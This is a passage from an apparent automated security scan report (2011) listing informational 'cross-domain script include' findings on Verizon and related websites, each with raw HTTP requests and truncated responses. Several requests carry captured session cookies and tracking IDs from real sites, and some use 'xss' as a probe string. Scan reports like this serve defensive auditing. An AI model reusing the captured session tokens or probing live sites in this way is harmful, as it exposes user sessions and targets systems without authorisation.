<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="generator" content="Convio CMS" />
<script language="JavaScrip
...[SNIP]...
<!-- Convio's CRM JS library -->
<script type="text/javascript" src="http://vznews.convio.net/js/utils.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://vznews.convio.net/css/FunctionalStyles.css" />
<script type="text/javascript" src="http://vznews.convio.net/yui3/yui/yui-min.js"></script>
<script type="text/javascript" src="http://vznews.convio.net/js/utils.js"></script>
<script type="text/javascript" src="http://vznews.convio.net/js/convio/modules.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="https://cmsadmin30.convio.net/system/auth/author-toolbar.jsp?hostID=136168508"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.15. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1?search= HTTP/1.1
Host: oascentral.verizononline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/smb_portlets/myapplication_rp/smb_orbitz.jsp

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1359
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Top1') {
document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296;sz=300x300;ord=571859577?" WIDTH=300 HEIGHT=300 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2870.vznbiz/B3160296;abr=!ie;sz=300x300;ord=571859577?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

16.16. http://phones.verizonwireless.com/htc/thunderbolt/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phones.verizonwireless.com
Path:   /htc/thunderbolt/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /htc/thunderbolt/ HTTP/1.1
Host: phones.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 14 Jul 2011 02:52:27 GMT
Accept-Ranges: bytes
ETag: "ec1b210d141cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 8159
Date: Mon, 05 Sep 2011 22:19:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
<t
...[SNIP]...
</script>


<script type="text/javascript" src="https://globalnav.vzw.com/scripts/motionpoint.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>

<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
...[SNIP]...

16.17. http://products.verizonwireless.com/index.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.verizonwireless.com
Path:   /index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.aspx HTTP/1.1
Host: products.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=75545
Date: Mon, 05 Sep 2011 22:35:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54859


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head><title>
   Media from Verizon Wireless - Media from Verizon Wi
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
...[SNIP]...
<div id="legal">
<script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en"
type="text/javascript">
</script>
...[SNIP]...
<!-- mp_trans_remove_end -->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=getitnow.vzwshop.com&size=S&use_flash=NO&use_transparent=YES&lang=en"></script>
...[SNIP]...

16.18. http://search.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.verizon.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?market=94531+zz&q=wss&rv=l&search.x=0&search.y=0&st=zz&tp=l&u1=q HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=l&rv=l&q=xss&search.x=0&search.y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=xss~xss%20sq~~~; CP=null*

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:05 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 70987


                   <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...
<meta name="description" content="Your enterprise faces complex challenges. And to be more competitive, you have to address them all. You need to merge complex networks as you ">
<script src="http://www.verizonbusiness.com/(none20:54:40)/templates/vzbcann/site.js" type="text/javascript" language="JavaScript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css" />
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/gn_engine.js"></script>
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/search.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://www.verizonbusiness.com//(none18:52:08)/templates/vzbar/site.js">
</script>
...[SNIP]...
<!--test-->
<script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/wz_tooltip.js"></script>
<script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/tip_balloon.js"></script>
...[SNIP]...
</script><script language="javascript1.1" src="http://www.verizonbusiness.com/templates/hbx.js"></script>
...[SNIP]...

16.19. http://search.vzw.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.vzw.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: search.vzw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:40 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Connection: close
Content-Length: 79416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Verizon Wireless Se
...[SNIP]...
</script>

   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/sp_includes/scripts/dropdown.js"></script>
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/sp_includes/scripts/global_search_results.js"></script>
...[SNIP]...
</script><script language="javascript1.1" src="http://www.verizonwireless.com/js/shared/hbx/hbx.js"></script>
...[SNIP]...

16.20. http://shop.verizonwireless.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.verizonwireless.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: shop.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:45 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Connection: close
Content-Length: 47467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- DEVICE.TMPL VS-GS3 .. new-->

<!-- HEAD -->
<!-- SU
...[SNIP]...
<META name="y_key" content="a3fe06ba3ee2fc5d" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<!--added by chris 1/14/2010 to reformat to 1024 width-->


<script type="text/javascript" src="http://content.atomz.com/content/pb00003783/publish/htdocs/search.js"></script>


<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
<script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

16.21. http://smallbusiness.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smallbusiness.verizon.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: smallbusiness.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 05 Sep 2011 22:16:23 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 125219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<head>
<t
...[SNIP]...
services to meet your organization's needs. Get connected to one of the most largest networks in the country so you can focus more on day-to-day operations without worrying about reliability." />

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=rgadevtest"></script>
...[SNIP]...

16.22. http://smallbusiness.verizon.com/products/voice/overview.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smallbusiness.verizon.com
Path:   /products/voice/overview.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/voice/overview.aspx HTTP/1.1
Host: smallbusiness.verizon.com
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; ASP.NET_SessionId=lhx45c55scwk1s45ya0xy155; BusinessUnit=business; vsrecentsearches=xss%20sq~~~~

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 05 Sep 2011 22:17:23 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 130281


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<head>
<t
...[SNIP]...
scription" content="Boost your business operations with reliable phone solution from Verizon Voice. Explore service plans, calling features, and equipment that fit your business calling needs." />

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=rgadevtest"></script>
...[SNIP]...

16.23. http://smallbusiness.verizon.com/products/voice/plans.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smallbusiness.verizon.com
Path:   /products/voice/plans.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/voice/plans.aspx HTTP/1.1
Host: smallbusiness.verizon.com
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/overview.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; ASP.NET_SessionId=lhx45c55scwk1s45ya0xy155; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 05 Sep 2011 22:22:01 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 196316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<head>
<t
...[SNIP]...
content="Every business has its unique phone requirements. Explore local, nationwide, &amp; international calling plans from Verizon Voice and choose the one that fits your needs &amp; budget." />

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=rgadevtest"></script>
...[SNIP]...

16.24. https://survey.qualtrics.com/SE/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://survey.qualtrics.com
Path:   /SE/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /SE/ HTTP/1.1
Host: survey.qualtrics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 05 Sep 2011 22:35:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Expires: Mon, 05 Sep 2011 22:35:56 GMT
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
ServerAddr: 192.168.1.29
Content-Length: 3874
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="">


<!-- *** WEB SITE INFORMATION AND COPYRIGHT ********************************************
...[SNIP]...
<link rel="apple-touch-icon-precomposed" href="../WRQualtricsShared/Graphics/qipadicon.png"/>

   <script type="text/javascript" src="https://a248.e.akamai.net/img.qualtrics.com/WRQualtricsShared/JavaScript/javascriptRequired.22262.js"></script>
   <script type="text/javascript" src="https://a248.e.akamai.net/img.qualtrics.com/WRQualtricsShared/JavaScript/javascriptSE.22262.js"></script>
...[SNIP]...

16.25. http://www.addthis.com/bookmark.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92777

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/20110825162931/js/bookmark.js"></script>
...[SNIP]...

16.26. http://www.connecttoverizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:14 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:19:14 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 32212

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Order Verizon Phone,
...[SNIP]...
<LINK REL="SHORTCUT ICON" HREF="http://www.connecttoverizon.com/favicon.ico">
<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/static/mrc.js"></script>
<script language="JavaScript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/static/Seymour.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.1.
Copyright 1997-2005 Omniture, Inc. More info available at http://www.omniture.com -->
<script type="text/javascript" language="Javascript" src="http://www.whitefence.com/static/omniture.js"></script>
...[SNIP]...

16.27. http://www.connecttoverizon.com/loginFailed.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /loginFailed.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /loginFailed.html?uname=xss&Go.x=26&Go.y=3&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Go=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268 HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=pcwhitefencecom%3D%2526pid%253DConnectToVerizon-Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.connecttoverizon.com/objects/images/spacer.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:17 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:20:17 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Failed | C
...[SNIP]...
<LINK REL="SHORTCUT ICON" HREF="http://www.connecttoverizon.com/favicon.ico">

<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/static/mrc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- mootools 1.2 with compatibility for previous version -->
<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/scripts/moo/mootools.v1.2b2.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.1.
Copyright 1997-2005 Omniture, Inc. More info available at http://www.omniture.com -->
<script type="text/javascript" language="Javascript" src="http://www.whitefence.com/static/omniture.js"></script>
...[SNIP]...

16.28. http://www.connecttoverizon.com/order-now.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /order-now.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /order-now.html HTTP/1.1
Host: www.connecttoverizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:08 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:36:08 GMT
X-Powered-By: PHP/5.2.3
Connection: close
Content-Type: text/html
Content-Length: 13969

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ConnectToVerizon
...[SNIP]...
<LINK REL="SHORTCUT ICON" HREF="http://www.connecttoverizon.com/favicon.ico">

<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/static/mrc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- mootools 1.2 with compatibility for previous version -->
<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/scripts/moo/mootools.v1.2b2.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/scripts/client/JsonP.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/scripts/client/AddyAjax.auto.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.1.
Copyright 1997-2005 Omniture, Inc. More info available at http://www.omniture.com -->
<script type="text/javascript" language="Javascript" src="http://www.whitefence.com/static/omniture.js"></script>
...[SNIP]...

16.29. http://www.darkreading.com/security/attacks/showArticle.jhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.darkreading.com
Path:   /security/attacks/showArticle.jhtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /security/attacks/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 05 Sep 2011 22:36:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=aHFlcnBxYTE5ZmU2aGVmdmF0OWFxM25vYzE%3D; expires=Mon, 05-Sep-2011 22:38:09 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://www.darkreading.com/security/attacks/showArticle.jhtml&gateway=true
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equiv="refresh" content="1200">

<script type="text/javascript" src="http://i.techweb.com/darkreading/detect.js"></script>
...[SNIP]...
<meta name="google-site-verification" content="oW_AmzGcViviVv2AI4k1ZPMek1AJgDWyjHXSsPRUWFE" />

<script src='http://i.cmpnet.com/informationweek/js/jquery-1.2.6.min.js'></script>
<script type="text/javascript" src="http://i.cmpnet.com/techweb/scripts/ddtabmenu.js"></script>
...[SNIP]...
</style>
<script language="JavaScript" type="text/javascript" src="http://i.cmpnet.com/informationweek/nop/popup.js"></script>
<script src="http://ar.voicefive.com/bmx3/node.pli?pub=ubm"></script>
...[SNIP]...
